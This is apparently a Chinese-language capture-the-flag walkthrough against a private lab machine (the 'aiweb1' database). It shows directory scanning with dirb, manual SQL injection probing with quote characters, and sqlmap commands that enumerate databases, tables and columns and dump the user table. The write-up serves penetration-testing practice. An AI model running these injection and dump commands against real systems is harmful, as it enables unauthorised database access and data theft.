一.先访问网页
二 . 对网站进行文件和目录扫描
出现robots.txt
三.进入网站查询
访问发现/m3diNg0/没有权限
访问发现/se3reTdir777/目录可以访问成功
四.使用dirb进行扫描
dirb http://172.16.1.88/m3diNf0/
dirb http://172.16.1.88/se3reTdir777/
扫描发现到172.16.1.88/m3diNf0/有一个info.php页面
尝试访问
五.发现是页面查询,考虑sql注入
输入一个1试试
返回成功
返回成功
返回成功
当我们输入id为4时,返回失败了,查询结果为无
我们可以从数据库中知道一共有三个用户
尝试使用单引号结果报错(1')
产生报错,报错原因是单引号末闭合
再加一个单引号,两个单引号刚好构成闭合,如果返回正常的话则存在sql注入漏洞
可以看到正常返回了id为1的结果,存在注入
使用sqlmap进行注入攻击:
由于是post数据包,我们需要打开BP进行抓包,将数据包进行复制,存储到txt中进行sqlmap测试
六.使用sqlmap扫描
查看当前服务下所有数据库
sqlmap -u "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -dbs
查看当前数据库下所有表
sqlmap -u "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 --tables
判断User表下字段名称
sqlmap -u "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user --columns
将id表中数据dump下来
sqlmap -u "http://172.16.1.88/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user -C id --dump